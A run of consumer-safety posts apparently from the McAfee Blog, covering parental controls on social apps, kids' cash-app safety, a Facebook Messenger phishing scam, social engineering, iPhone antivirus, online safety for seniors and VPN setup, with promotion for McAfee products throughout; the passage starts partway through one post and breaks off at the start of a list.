To activate Device Security, Telstra customers can simply go in-store, online or to their MyTelstra app. The full suite of McAfee features supported include Antivirus/System Scan, Safe Browsing, Protection Center, Identity Protection, Password Manager, Parental Controls, Protection Score and Secure VPN. All eligible Telstra customers can try Device Security for three months on Telstra, then auto-roll onto $10/month after. 

The post McAfee and Telstra Partner to Bring Privacy, Identity and Security to Australian Customers appeared first on McAfee Blog.

Setting Up Parental Controls in TikTok, Instagram & Snapchat

By Toni Birdsong

It’s a question we get a lot from parents: “How can I keep my kids safe when they are constantly hopping between so many different apps?” We get it, there’s a lot to stay on top and all of it changes constantly. Unfortunately, that question doesn’t have a simple answer. But there are some baseline actions every parent can take to boost their child’s safety on popular apps like TikTok, Snapchat, and Instagram.  

The safety equation is threefold, with every piece as important to your child’s overall safety as the next.  

  1. Connection and conversation. The first part of the safety equation is maintaining a strong relationship with your child so that dialogue (two-way; no lectures) on digital safety and wellbeing becomes commonplace and they know they can come to you if they have a problem. One way to keep those conversations rolling is to download your child’s favorite apps so that you understand first-hand how the communities work and the type of content that’s being shared. 
  2. Install parental controls. The second part of the safety equation is to add parental controls. Do we have an agenda here? You betcha! For decades, we’ve put some of the world’s brightest engineering minds into designing digital tools that allow families to enjoy the best of the Internet without giving them the rest of the Internet that could put their emotional and physical wellbeing at risk. McAfee’s targeted software helps parents monitor and filter web searches and content, set time limits, and view daily activity reports.  
  3. Access platform tools. The third way is to take a few minutes to ensure your kids are using the platform-level tools available on both their devices and within the apps. Both Apple and Android phones have basic safety and wellbeing features. Additionally, the apps your kids likely love—Tik Tok, Snapchat, and Instagram—have their own set of safety tools.  

Screentime is Climbing 

A report released in 2021 by Common Sense Media found that teenagers (ages 13-18) use an average of nine hours of entertainment media per day and that tweens (ages 8-12) use an average of six hours a day, not including time spent using media for school or homework. The report also found that boys spend more time on gaming devices while girls spend more time on social media and that mobile devices now account for 41% of all screen time among tweens and 46% among teens. 

With those numbers increasing each year, it’s even more important to understand the different ways parents can help kids stay safe. Let’s break down a few safety basics on each app that are easy to access and use.    

Tik Tok Safety 

TikTok has some impressive safety guidelines broken down into topics parents could easily use as a springboard for some great family discussions. The guidelines and the Safety Center cover issues such as dangerous TikTok challenges and how to deal with other digital threats such as bullying, sexual content, fake news, and hateful behavior. You can increase safeguards using TikTok’s: 

  • Family Pairing. TikTok offers Family Pairing that allows parents to link their account with their child’s to co-control settings on privacy and content. This TikTok feature allows a parent to monitor and manage screen time, direct messages, set restrictions, and control friend and comment filters.  
  • Restricted Mode. There is a Restricted mode for accounts that can help filter basic mature content on TikTok. 
  • Privacy Settings. To ensure your child isn’t connecting with unknown people on TikTok, you can go into the settings and make their account private.  
  • Digital Wellbeing. We all know how easy it is to get sucked into spending hours on an app without even getting up to stretch or give our eyes or minds a break. Turning this function on will send alerts to users who have been on the app for more than two hours.  

Snapchat Safety 

Every app functions differently and thus, offers different ways to boost security. Snapchat provides a helpful guide for parents and educators, including safety tips and conversation starters. You can increase safeguards using Snapchat’s: 

  • Privacy Settings. Sit down with your child to ensure their privacy settings are adjusted to choose who can send them Snaps, view their Stories, or see their location on Snap Map. They can also manage who views your child’s content with My Story. 
  • Friends Only Feature. Snapchat was made for keeping in touch with your close friends, so the app Safety Center recommends users “only friend or accepts friend requests from people that you know in real life.” 
  • Report Abuse Feature. Ensure your kids understand how to report abuse on Snapchat, including harassment, bullying, or other safety concerns. If someone makes them uncomfortable, they can block that Snapchatter and leave any group chat. Here’s more on reporting abuse or safety concerns. 
  • Think before you share. Snaps are designed to delete by default within 24 hours. However, remind your kids that people who send Snaps can still take a screenshot or take a picture of the Snap with another device. Therefore, on Snapchat especially, advise your kids to think before sharing. 

Instagram Safety 

Instagram offers parents and minor users a library of safety and mental health resources accessible via the app’s Community Tab at the bottom of its home page. You can increase safeguards using Instagram’s: 

  • Family Center. A parent or guardian can supervise a teen’s Instagram account, provide extra support, and help balance their time. Parents of teens can remove supervision anytime, and the tool is automatically removed when the teen turns 18. 
  • Privacy Controls. Your teen’s account can be set to private, which means their content will only be seen by approved followers. In addition, they can also block and report abusive accounts.  
  • Comment Controls. Avoid unwanted interactions by encouraging your child to use “Comment Controls.” In addition, reporting and blocking tools also allow them to manage who can comment on their posts.  
  • Direct Message Safeguards. Instagram restricts Direct Messages (DMs) between teens (under 18) and adults they don’t follow. When an adult tries to message a teen who doesn’t follow them, they receive a notification that DM’ing that teen isn’t an option. For adults and teens already connected (i.e., one account follows the other), Instagram sends safety notices encouraging teens to be cautious in conversations with adults who have exhibited potentially suspicious behavior. (Note: This feature does not protect kids from connecting with fraudulent catfish accounts created using false profile and age information). 

One of the most powerful safety features is you—a child’s mom, dad, or guardian. Your face-to-face, heart-to-heart connection will speak loudest in your child’s life. If you haven’t lately, ask your child what’s going on in their digital life, who their friends are, what they’ve created to share, and what’s new, hilarious, or trending. You may get some resistance now and then but don’t let that discourage you from pressing in and doing all the things that help keep them as safe as possible online.   

The post Setting Up Parental Controls in TikTok, Instagram & Snapchat appeared first on McAfee Blog.

#McAfeePride2022

By Life at McAfee

In the spirit of #PrideMonth, McAfee hosted month-long celebrations across the world. One of these was a live event hosted by the McAfee Pride Community with a guest speaker from the Resource Center that focused on the history of Pride, support, allyship, and belonging.

We took a moment to ask our event guest speaker, Leslie McMurray, about the work that Resource Center does, the importance of pride, and what companies can do to create inclusive work environments.

Tell us a bit about Resource Center and what you do?

“We like to say, if we had an “elevator pitch”, we would need a really tall building! Resource Center has been around for 39 years and is one of the largest LGBTQIA+ community centers in the United States, it is a primary HIV/AIDS service organization in Texas.

Some of the work that we do includes operating a food pantry and hot meal program that serves low-income people living with HIV. We have a case management department that helps locate resources that we don’t directly provide, like housing. And we have a primary care clinic that is gender-affirming and a ten-chair dental clinic that also serves those living with HIV.

We also have a youth program called Youth First that serves youth from middle-to-high school. We have a behavioral health program and a clinic that does free testing for HIV and STDs along with a mobile health unit that does free testing in outlying areas. Finally, our advocacy department has three full-time employees!

Why it is important to learn about pride?

“Sometimes we get asked “What’s ‘Pride’ about? Why do you need a parade?”

It’s important to understand that LGBTQIA+ people are still working to achieve equal rights – the same as everyone else.

The tipping point of the fight for equal rights in the US dates back to 1969 when the Stonewall Uprising took place in Manhattan. The first Pride march was held a year later to honor the anniversary of the Stonewall Uprising and continues to take place during the month of June each year. And while we appreciate the attention during the month, the continued fight for equal rights for the LGBTQIA+ community is yearly, and we need continuous support and allyship of people and businesses year-round.

So it’s really important for people to learn about diverse populations, understand what their challenges are, and educate yourself on these issues – from that spring’s allies.”

What should companies do to create inclusive work environments

“One of the simplest things for companies to do is to include ‘Sexual Orientation, Gender Identity and Gender expression’ in your Equal Employment Opportunity statement. Other things companies can do is to look at putting a policy in place for transgender employees who are transitioning and consider including transgender healthcare in your company benefits package.

Make sure to help foster understanding by getting employees to do training with organizations like Resource Center. And empower upper management to lead the way ensuring all employees can bring their whole selves to work. Finally, when the opportunity arises look at working with and bringing in non-profit organizations into your company to continue spreading awareness and support for the LGBTQIA+ community.

And while June wraps up Pride month, year-round we work towards a workplace and community where all can belong – a workplace where our unique differences are celebrated and where we all stand together for equality. #McAfeePride

Learn more about the incredible work that Resource Center does here

Interested in building your career at a company where you can belong? Search our openings!

The post #McAfeePride2022 appeared first on McAfee Blog.

Kids & Cash Apps: What Parents Need to Know

By Toni Birdsong

Fewer people carry cash these days, kids included. This growing paperless reality fast-forwards the parenting task of educating kids on financial responsibility. As of 2021, most cash apps allow kids 13 and up to open accounts (previously, the age was 18). Kids can also get a cash app debit card for retail purchases. But while cash apps are a popular and convenient tool, they come with some risks families should consider.  

Instant Transactions 

Cash apps allow kids to exchange money with friends directly from a secondary established account, much like handing another person cash. Cash apps have become a popular tool with kids and an easy way to split costs or pay someone for a purchase. Cash apps also come in handy for families and allow parents to instantly send their children money for daily expenses such as school or sports fees, meals, purchases, or entertainment. Some common cash apps include Venmo, Zelle, Cash App (Square), Pay Pal, Zelle, and Facebook Pay, among others.   

Some Risk 

Sounds awesome right? But with ease comes risk. Most money transfer app funds are not FDIC insured. That means if your child (or you) accidentally sends money to an unintended recipient, they may have a tough time recovering those funds.  

Every app comes with some degree of risk. While the leading cash apps are considered secure and can be used with little concern, there’s always the potential of a cyber crook finding a security loophole that exposes your money, banking information, and identity.  

10 Cash App Safety Tips for Families 

  1. Discuss the risks. Clicks within a cash transfer app equal real cash. Help your kids understand digital money is equal to actual dollars. Take the time to discuss current scams and how to practice extra care when using cash apps.  
  2. Use safeguards. Using security best practices is not a skill that comes naturally to most people. It’s something that must be practiced and improved constantly. Just like computers, mobile devices can be infected with viruses and malware. One way to protect mobile devices (and cash apps) is to subscribe to a mobile antivirus product, such asMcAfee Mobile Security, which includessafe browsing, scanning for maliciousapps, and locating your device if it is lost or stolen. 
  3. Layer up app security. In addition to an antivirus tool, guide your kids in how to add additional security to their cash apps. Guide them in how to follow password security protocols and how to add protection in the form of a PIN code, facial ID, or fingerprint ID. While you are at it, make sure your child locks their device in the same way. These steps offer more protection in case your child’s phone is stolen or lost, and a stranger attempts to use the cash app.  
  4. Slow down and verify. As fast as kids’ fingers move on keypads, advise your child to slow down and verify spelling and a recipient’s account address when using a cash app. Most cash app providers will not help users recover misdirected funds. One typo or clicking on the wrong Jake Williams in the recipient list can cost you or your child big bucks.  
  5. Only connect with friends.When using cashapps, advise kids to only exchange money with people they know. Scammers have been known to befriend minors only to ask for a loan or offer goods or services. Once the payment is sent, the scammer instantly deletes their accounts and is gone without a trace.  
  6. Stay on top of cash app scams. CheckBBB Scam Trackerto see how bad actors are targeting cash app users. In searching cash app scams on this site, consider reading the personal stories (click “details” of each reported scam) of the people who have been victimized. This might be a very effective way to converse with your kids about the natural consequences of online scams.  
  7. Safeguard personal data. Remind kids not to share their email, address, or other information. Also, avoid clicking pop-up ads, trendy quizzes, and random website URLs designed to plant malware on a device that steals bits and pieces of personal info that can be used for various attacks, including financial and identity theft.  
  8. Link your app with a credit card. If possible, consider linking your child’s cash app to a credit card rather than a bank account. Debit cards remove cash from an account instantly, but credit cards offer consumer protection in cases of fraudulent transactions. The one drawback is that a credit card company will charge interest on your balance.  
  9. Keep app balances low. Cyber crooks can’t steal funds that aren’t there. For that reason, it’s wise to keep balances low in your child’s cash app account.  
  10. Teach financial literacy basics. The cash app conversation is an excellent opportunity to begin or expand your family’s conversation on financial literacy. Here are several helpful resources that will help you teach your kids financial literacy at any age.     

The use of cash apps is here to stay and, no doubt, an integral part of the overall paperless fast track we’re all on. Guiding kids into this realm equipped with knowledge and confidence is a powerful way parents can help kids enjoy the responsibility of money without falling prey to digital risks.     

The post Kids & Cash Apps: What Parents Need to Know appeared first on McAfee Blog.

Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam

By McAfee

In this digital age, communicating online and through our devices has become the norm. From sharing highlights of last night’s game to sending cute animal videos back and forth, so much of our connectedness happens virtually. It’s become so easy to chat with friends and loved ones through social media that we don’t even have to think about it. We know who’s on the other end of the screen, so why would we worry? We know our friends would never send us a malicious link that would steal our information, so why be cautious? Right? 

Not necessarily. Though a message or link may seem like it’s coming from a friend, it’s also possible that it was sent without their knowledge. There are many ways for hackers to scam people very believably. The latest Facebook Messenger hack is just one of many examples. 

Facebook Frenemies 

According to PIXM, Facebook users have been conned for several months by a phishing scam that tricks them into handing over their account credentials. Users are shown a fake login page that copies Facebook’s user interface, giving it the illusion of being real. When someone enters their credentials, their password and login combo is sent to the hacker who then sends out the same link and fake login to the user’s friends through Facebook Messenger. Any user who clicks the link is asked to fill out their credentials, and the cycle repeats. PIXM estimates that over 10 million Facebook users have been duped by this scam since 2021. 

This hacker was able to utilize a technique to evade Facebook’s security checks. When a user clicks on the link in the Messenger app, the browser redirects to a legitimate app deployment service, then redirects again to the actual phishing pages with advertisements and surveys that accrue revenue for the hacker. Using this legitimate service link prevents Facebook from blocking it without blocking other legitimate apps and links as well. Researchers say that even if Facebook managed to block one of these links, several others are created with new unique IDs every day to replace it. 

Phishing scams like these are harder to detect due to the realistic-looking interface on the login pages and that these malicious links are seemingly coming from friends and family. However, there are always key things to look out for when faced with phishing scams. 

Swim Away From These Phishes 

Scams don’t always come from overtly sketchy emails or text messages from strangers. Sometimes they can (unintentionally) come from people we know personally. This isn’t to say that your friends online can’t be trusted! However, it’s important to always be cautious and keep an eye out for any odd behavior to stay on the safe side. Here are some key things to look out for when faced with potential malicious phishing scams: 

  • Lack of personalization. These types of scams may be coming from online friends you don’t speak to often, if at all. If someone you rarely speak to is sending you links out of the blue, that’s an automatic red flag. But if you’re still unsure or if this is coming from someone you know well, pay close attention to the message, the greeting (if any), and whether it’s personalized or not. If it seems cold or overly general, avoid it!
  • Links don’t look quite right. If you’re receiving a link through email, hover over the URL without clicking on it to see the link preview. If it looks suspicious, delete it altogether. For links being sent through social platforms, check to see if the URL matches the content in the message being sent to you or if there is a preview attached. If these things don’t match or aren’t present, it’s best to play it safe and stay away.
  • Spelling and tone seem off. If the message you’re receiving is riddled with spelling or grammar mistakes, proceed with caution, especially if it’s unlike your friend to have those types of errors in their messages. In that same vein, if the tone of the message doesn’t match the typical vibe of the person you’re receiving it from, it’s best to ignore it and move on!
  • The message is telling you to act. Always be wary of a strange message and link asking you to act. If the message is telling you to download something, don’t click any links or attachments. Simply delete the message and carry on!

When in doubt, just ask! If you’ve received a message and a link from a friend online, simply ask if they meant to send it to you. If they didn’t send it themselves, not only did you dodge a bullet, but your friend is also now aware that they’ve been hacked and can take the necessary precautions to ensure their information is protected. And if they did mean to send it to you, then you can click the link knowing that it’s safe to do so. It’s always best to err on the side of caution when it comes to your online security. 

The post Over 10 Million Facebook Users Hacked in Ongoing Phishing Scam appeared first on McAfee Blog.

It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online

By McAfee

It’s Social Media Day! How are you celebrating? Reposting your very first profile picture from a decade ago? Sharing your most-loved status update or the photo you’re most proud of? This year, consider commemorating the day by learning more about how to keep your information safe. Enjoy your favorite platform, but be on the lookout for scams, such as social engineering. 

What is Social Engineering 

Social engineering is a cybercrime common to social media sites. It is a tactic where a cybercriminal lurks on people’s social media pages, gleaning personal information that they then use to impersonate them elsewhere. 

With more than half of the global population on social media, you may think that a cybercriminal will never single you out from such a huge pool; however, it is possible.1 Luckily, you only have to make a few, easy changes to your online habits to keep your valuable private information just that: private. Check out these tips to make smart decisions and be more confident about your and your family’s online security. 

Why Do Cybercriminals Care About Social Media? 

Think of the types of posts you share with your dozens – or even hundreds or thousands! – of followers: updates about your life, where you live, work, or favorite travel destinations, your hobbies, pets, family members, etc. All of these details, that only you and those closest to you should know, are a valuable commodity to cybercriminals. Plus, now that social media shopping is growing in popularity, the credit card information linked to accounts is sweetening the deal for cybercriminals. 

Here are a few social engineering scams that are common to social media.  

Credential stuffing

People commonly create passwords based on things, places, and people that are important. Have you ever published a 20 questions-style get-to-know-me post? Those contain a lot of valuable personally identifiable information (PII). With just a few of those details about your personal life, cybercriminals can make educated guesses at your passwords, a tactic called credential stuffing. If they’re able to crack the code to one of your accounts, they’ll then input that password and login variations in several other sites, especially online banking portals, to see if they can gain entry to those too. 

Fake contests 

You’ve won! Send us your banking information and address, and you’ll receive a package in the mail or a direct deposit to your bank account!  

But did you enter a drawing for a prize? Very rarely does anyone win something just by being a follower of a certain page. If you receive a message similar to the above, it’s likely a phisher trying to draw more PII and sensitive banking information out of you. Or, the message may have links within it that redirect to an untrustworthy site. If you regularly enter social media contests, keep a list and only respond to legitimate ones. Also, never give your banking information out over social media, private messages, or email. 

Emotional messages and posts

There are plenty of valid fundraisers and petitions circulating around social media; however, there are just as many social engineering scams that dupe social media users because they inspire a strong emotion in them. For example, there have been several scams around Ukrainian donation sites. Cybercriminals often use fear, anger, or sadness to inspire people to open their wallets and share confidential banking information. 

How to Protect Yourself from Social Engineering

Luckily, all it takes is a few smart habits to stop social engineers in their tracks. Consider the following tips and make these small changes to your social media usage: 

Edit your follower or friend lists

At this point, you’ve probably had several of your social media accounts active for over a decade. That means it’s time to do some cleaning out of your friends and followers lists. It’s best to only accept requests from people you personally know and would actually like to keep in the loop about your life. A friend and follower request from strangers could be cyber criminals in disguise. Also, consider setting your account to private so that your posts are invisible to strangers. 

Slow down and think 

Social engineering hacks often bank on people acting rashly and quickly because of strong emotion, either excitement, fear, sadness, or anger. If you see a post on your newsfeed or receive a direct message that gives you a tight window to respond and asks for PII, slow down and think before acting. Double-check the destination of every link in the message by hovering over it with your cursor and checking the link preview at the bottom of your browser screen. Be careful, because some link previews include slight misspellings of legitimate websites. As a great rule of thumb, be automatically skeptical of direct messages from people you do not personally know. And if a DM from a friend seems out of the ordinary, shoot them a text to confirm they actually sent it. It could be that their social media account was hacked and a criminal is spamming their followers.   

Create strong, unique passwords or passphrases

A password manager will go a long way toward ensuring you have unique, strong passwords and passphrases for every account. Not reusing passwords makes credential stuffing impossible. McAfee True Key stores all your logins and passwords and guards them with one of the strongest encryption algorithms available. All you need to do is remember your master password. It’s a great practice to also enable multifactor authentication whenever a website offers it. This makes it incredibly difficult for a cybercriminal to break into your online accounts with their educated guesses at your password. 

Live More Confidently and Safely Online 

Now that you know what to look for and the best tricks to be safe, you can feel more confident that you’re doing everything you can to protect your online accounts and private information. McAfee Protection Score can also help you take control of your online safety. This service allows you to monitor your current online safety and encourages you to take specific steps to improve it. Now you can enjoy digitally keeping in touch with your friends with peace of mind! 

1Smart Insights, “Global social media statistics research summary 2022 

The post It’s Social Media Day! Here’s How to Protect Yourself From Social Engineering Online appeared first on McAfee Blog.

Does an iPhone Need Antivirus Software?

By McAfee

If you’re one of the countless Apple iPhone owners out there, there’s a good chance that one of the reasons you love your smartphone is because you’ve heard that Apple devices tend to have fewer vulnerabilities to viruses.  

Because of their shared operating system, iOS devices enjoy Apple’s security measures, which keeps them protected from malware and viruses differently from most Android devices 

This is great, right? Certainly! But it’s also important to remember that nothing digital or internet-related is ever foolproof, and while it’s rare, even iOS operating systems can be affected by malicious software 

The great news is that protecting yourself from iPhone viruses and hackers isn’t hard. Read on to learn more. 

Can iPhones get viruses?

Although Apple has designed its iOS system to be pretty untouchable, it’s still possible to get a virus on your iPhone 

The biggest way this can happen is through something called “jailbreaking,” which is when you bypass the restrictions on the Apple operating system. You might do this to gain more control over your device, downloading any apps or programs from anywhere on the internet. It basically lets you do whatever you want with your iPhone. 

A major reason that mobile security is so seamless with Apple’s iOS is that — unlike Android and Microsoft Windows products — Apple devices are designed to work only inside set parameters that “talk” exclusively to other approved Apple apps or devices.  

This is all controlled by Apple encryption, making your iPhone security rather impervious to malicious apps. You might also notice that there are no antivirus apps in the App Store, which isn’t a coincidence! 

But when you jailbreak an iPhone, this means you’ve opened the iOS to a wider range of apps, features, and themes — none of which are approved by Apple 

So, you won’t benefit from the virus protection that comes from having a closed system, meaning you can expose your iPhone to adware, scams, and other internet security issues that Apple permissions blocked. 

Potential threats to your iPhone

So, you’ve jailbroken your iPhone and are out of Apple’s famously closed sandbox. While it’s not an ideal situation, it’s not the end of the world. You may need antivirus protection now. This is especially true if you frequently use public Wi-Fi 

Here are a few potential threats that a jailbroken iPhone might face: 

  • Phishing: Unfortunately, malicious websites don’t come with a fraudulent website warning. Phishing happens when a cybercriminal sends a fraudulent message aimed at getting you to reveal important data like your personal or financial information. If your iPhone is successfully phished, private data on the iCloud and your device can be compromised. 
  • Ransomware: Unsecured Wi-Fi networks can expose connected devices to ransomware. This type of malware threatens users with permanently blocked access to their devices unless they pay a certain amount of money. Some ransomware programs will even try to coerce money from users by warning that private information will be published if they don’t pay a ransom. 
  • Malware: The reason so many different security apps and antivirus programs exist is that malware is everywhere. It also comes in many forms! Malware is a general term used to describe any software program intended to gain unauthorized access to a computer system or device. Malware can disrupt or disable a device, network, or specific user. It can also actively leak private information and create privacy concerns. 

5 signs your iPhone has a virus

If you’re worried about the Wi-Fi you used at a coffee shop last week and are searching for the “best antivirus protection for Apple,” don’t curse that java-inspired Safari surf just yet.  

There are a few telltale signs that your iPhone or another Apple device has been infected with a virus. They include: 

  • Overheating: Being out in the extreme sun or having an old battery can be culprits for overheating. But if you’re repetitively seeing that feverish red thermometer on your screen, your iPhone could be letting you know it’s infected with malicious software. 
  • Unexplained data usage: If you don’t have an unlimited phone plan, you probably keep a pretty close eye on data usage. So, if you see big increases in usage that don’t match your activity, this could be a sign that your iPhone may have a virus. 
  • Pop-ups: Sometimes, there’s no escaping those pesky “look at me” boxes that pop up when you’re online. But seeing many pop-ups can indicate that your Apple device is harboring unwanted guests. You can minimize pop-ups by using a virtual private network like McAfee Secure VPN. 
  • Suspicious apps: Make a habit of scrolling through your list of apps from time to time. This could be a red flag if you see anything that you don’t remember downloading yourself or that didn’t come with your iPhone. 
  • Quick battery drainage: If your iPhone is older or has many big apps, your battery will typically drain faster. But it could also mean an unwanted and unseen program is running in the background. 

How you can protect your iPhone

The first and best way to protect your Apple device from cybersecurity concerns is to avoid jailbreaking it. While an iPhone might be limited in what apps and themes you can enjoy, its built-in security features really can’t be beaten.  

Here are some other ways you can keep your iPhone safe from malware and viruses: 

  • Keep software updated. Each new version of Apple iOS has patches for security holes discovered by Apple’s internal hackers. Be sure to keep your iPhone software up to date to make sure you’re enjoying the latest security features. You can even set up automatic software updates to make things easier. 
  • Set up USB restricted mode. Protect your data from “juice jacking,” which is when someone steals your data through your phone’s USB port as it’s plugged into a public charger. Head to “Settings” and then to “Face ID and Passcode.” Enter your passcode and toggle “USB Accessories.” 
  • Use a password manager. A password manager like McAfee True Key can lend several additional layers of security to Apple’s already highly encrypted operating system. Consider a password management system that can help you create strong passwords and uses biometric security features like fingerprint recognition. 
  • Enable Touch ID. This may seem like an old-school feature compared to facial recognition. But having touch ID enabled can reduce the chances of someone gaining unauthorized access to your iPhone since it requires your physical presence to open it.  
  • Use a VPN. If you use public Wi-Fi a lot, you risk exposing your personal information. McAfee Secure VPN uses bank-grade encryption to keep your data protected while you live your life online — no matter where you are. 
  • Consider antivirus software. Antivirus software can handle many potential vulnerabilities by looking out for online threats like hackers. McAfee antivirus software offers real-time threat protection across multiple devices and can help keep your iPhone free of data breaches. 

Keep your everyday devices secure 

In this day and age, we all live on our devices. And while it’s great to have the built-in security of Apple’s iOS, why settle for just one line of defense?  

For complete protection against malicious software like viruses, malware, and more, look to McAfee Total Protection. Our all-in-one approach means you’re shielded from data breaches, have access to a secure VPN, and can receive up to $1 million in identity theft coverage. The best part is that it works for multiple devices, including Mac OS and iOS 

Enjoy the peace of mind that comes with having McAfee in your corner.  

 

The post Does an iPhone Need Antivirus Software? appeared first on McAfee Blog.

Online Safety for Seniors – How to Keep Older Family Members Safe Online

By Alex Merton-McCann

Heard of the sandwich generation? Well, if you’ve got a tribe of kids and parents who are aging then you are a fully-fledged member! And as members of this special club, not only do we need to manage and keep our offspring in check, but we also have to reserve some energy to help our parents navigate life’s challenges which of course includes the online world. 

In the broadest sense, the sandwich generation is the ‘caught in the middle’ generation who have living parents and children to care for. More often than not, it’s people like us, smack-bang in middle age, who support both their parents and children financially, physically, and/or emotionally. And with life expectancies looking rosier than ever and many of us choosing to have careers before we become parents, it’s inevitable that us middle-aged folks are feeling a little squeezed at both ends! 

Digital Parenting Can Feel All Consuming 

Getting our head around keeping our kids safe online can feel overwhelming for many of us. Keeping up with the latest apps, games and platforms can often feel relentless and let’s not forget about trying to weave in cyber safety messages to ensure our kids make safe decisions online too. But when the downside of not being vigilant about online safety is so great, it’s essential that we extend our digital education messages to the older members of the family too! 

Over 90% of Aussie Seniors are Connected to the Internet 

One of the silver linings of the pandemic is that it gave a real push to those who were resisting getting online. And in most cases, that was the older member of our society. Research from ACMA shows that by 2020, over 90% of Australian seniors had internet connectivity in their homes compared to 68% in 2017. But as we all know, owning a car and driving it are 2 very different tasks!  

My parents, who are both in their late 70’s, do a pretty good job of managing their online lives. They bank online, are avid email senders and can even do a little Facetime, thanks to COVID! But they are a work in progress – like everyone. And while I try very hard to keep them up to date with new apps and risks, I have learnt over the years that less is more. That not overwhelming them is actually the key. In fact, the simpler I keep my updates and tips, the more likely they are to get onboard with my message.  

So, in the spirit of the experience with my much-loved mum and Dad, I‘d like to share with you the top things you can do to keep your much loved older family members safe when they go online. 

1. Invest in Protection Software 

I accept that there are no real guarantees in life but there are risk-minimizing decisions. And ensuring all devices have top-level security software is one of those. Not only will this protect your loved ones from downloading viruses and malware, but it will also allow them to shop with confidence at approved ‘safe’ websites, help them manage their passwords, locate their devices plus loads more. It’s such a small price to pay for increased peace of mind. Check out McAfee+ protection which can protect your family’s entire fleet of devices. 

2. It’s All About Passwords 

A secure password is a key to keeping one’s online life safe so taking some time to formulate a strategy for older family members is so worthwhile. Downloading a password manager was a total life changer for me. Not only did it help me create complex passwords that no human could ever generate but it remembers them for me too. I only have to remember the master password and it then automatically logs me in! Now, if this was set up carefully for older family members, this could be an amazing tool to protect their online life.  

I am also very aware that writing down passwords ‘in a special book’ is used very commonly. And if this is the only way that will work for your family members then try to make these passwords as complex as possible without overwhelming them. A complex, nonsensical sentence would work well here but just ensure each account has its own sentence in case the account gets hacked.      

3. Software Updates 

Out-of-date software is a little like leaving your front door unlocked – it makes it far easier for unwanted visitors. In almost every case, a software update includes a patch for a security vulnerability – a weak hole in the company’s software that could expose the user to risk. So, when I discovered that my parents were ignoring reminders for updates as they had become very annoying, I sprang into action! Most software updates can be automated so I strongly encourage taking some time to ensure all the software your family members use is set up to update automatically. 

4. ScamWatch 

Unfortunately, older Aussies are often the target of online scams. Scammers will work overtime to get their trust with the aim of extracting dollars or their personal details. I wish I had a silver bullet that would protect all vulnerable types from these cybercrims, but I don’t. The next best option is to talk about scams and some of the sneaky techniques scammers will use with them. I remind my parents regularly not to reply to emails from people they don’t know, not to even answer calls from numbers they aren’t familiar with and that if they receive a call from their bank and they aren’t sure whether it is legitimate, ask for the caller’s number so you can ring them bank – if the caller is legit, that won’t be a problem.  

If you think about it, keeping your older family members only is simply an extension of keeping your kids safe. The messages and strategies are almost identical! So, if your older family members use a Messenger app, why not set up a family group chat with both the younger and older family members? You can share news stories about online risks and better still, get the kids involved too! So, next time your parents have an issue with their phone – the kids will be able to help out! Awesome!! 

Take care 

Alex xx 

The post Online Safety for Seniors – How to Keep Older Family Members Safe Online appeared first on McAfee Blog.

How to Set Up a VPN

By McAfee

In today’s connected world, you can do so much on the internet. It’s never been easier to stay entertained (Netflix, anyone?), informed, and productive. But it’s important to keep your online activities private and safe, whether you’re checking social media, using a streaming service, or banking online.  

With the right solutions, you can have a worry-free online experience. 

Thankfully, virtual private network (VPN) software keeps your data secure by hiding your IP address (the address your device uses to access the network). In this article, discover the benefits of a VPN, learn how to set one up, and review some things to consider when looking for the right VPN solution for you. 

What is a VPN?

A virtual private network (VPN) is software that protects your internet connection by keeping your IP address secure and anonymous. Essentially, it opens a private tunnel just for you!  

It does this by making a secure connection between your internet-connected device and a remote VPN server. It also encrypts the information you upload onto the internet, preventing others from intercepting it.  

This means you can feel confident surfing the web without worrying about other people uncovering your location, identity, or online activity 

Benefits of a VPN

A perfect digital world wouldn’t have malware, website trackers, ISP data throttling, or prying eyes. Thankfully, investing in a good VPN can help you overcome a lot of these challenges.  

Here’s a little more detail about the benefits of a VPN: 

  • Stay safe by blocking malware. Depending on the type of VPN you use, it may come with a feature that blocks malware. This functionality adds another protective layer to your network, like some sort of firewall, so you don’t lose sleep over malicious software. 
  • Beat the ISP throttling blues. VPNs provide a practical way to stop your internet service provider from throttling your bandwidth or data. Without throttling, you can enjoy maximum internet speeds even after you’ve reached your data or bandwidth limit. 
  • Outsmart website trackers. Mobile apps and websites work tirelessly to record information about your online activity. This practice can be bothersome if you’re a stickler for privacy. A VPN keeps the trackers guessing about the nature of your information thanks to advanced encryption. 
  • Protect yourself on public Wi-Fi. If you regularly connect to the internet via public Wi-Fi, it’s important to stay safe using a VPN. An unsecured public Wi-Fi network provides an easy way for criminals to steal sensitive information like your credit card number and passwords. There’s no need to worry about anyone seeing or stealing your data when you use a VPN. 

How to set up a VPN server

Investing in the right tools is a surefire way to make yourself feel less vulnerable to online risks. Rather, you’ll feel empowered to enjoy a care-free online experience.  

McAfee® Safe Connect VPN is one such tool that gives you the freedom to enjoy all the good things that the internet offers without worrying about online privacy or safety. 

This tool works on multiple platforms, including Microsoft Windows, macOS, Android, and iOS. More importantly, McAfee Safe Connect VPN is easy to set up on different devices, allowing you to benefit from bank-grade AES 256-bit encryption. So, you can browse the internet using Chrome or another browser and connect via public Wi-Fi without losing sleep over vulnerability to risks. 

Depending on your preferences, it’s possible to set up a VPN automatically or manually. We discuss the steps to set up a VPN manually in the sections below. 

Set up a VPN connection on Windows

Easy setup and connection to a VPN server are key factors when choosing the right tool or software for your needs. On a Windows 10 system, just follow a few steps to establish a secure and stable connection. 

  1. Search for the virtual private network on Cortana. 
  2. Then, go to the VPN settings and select the plus sign (“+”). 
  3. On the drop-down menu that appears, select “Windows built-in.” (The system automatically sets the VPN type to automatic. You can change it to VPN protocols like PPTP, TCP, SSTP, L2TP/IPsec, or IKEv2.) 
  4. In the next fields, add VPN configuration details from your VPN provider (in this case, McAfee Safe Connect VPN). 
  5. Once you’ve completed filling in the details, click “Save” and then “Next.” 
  6. In the last step, select the McAfee VPN connection, and you’re done! 

Set up a VPN connection on a Mac

The next time you need to set up a VPN on a Mac computer, you’ll be pleased to know that the setup steps are short and sweet. 

Here’s what you need to do. 

  1. Start by clicking “Network” under “System Preferences.” 
  2. Next, click on the “+” sign and select “VPN.” 
  3. In the pop-up interface that appears, add details like connection name, server address, VPN type, server name, and authentication settings for advanced options. 
  4. In the final step, click “Apply” and “OK” to finish. 

5 things to look for in a VPN

Picking the best VPN solution that takes care of your privacy needs involves ticking various boxes based on the features and functionality that matter most to you. 

Here are some things to look for in a virtual private network: 

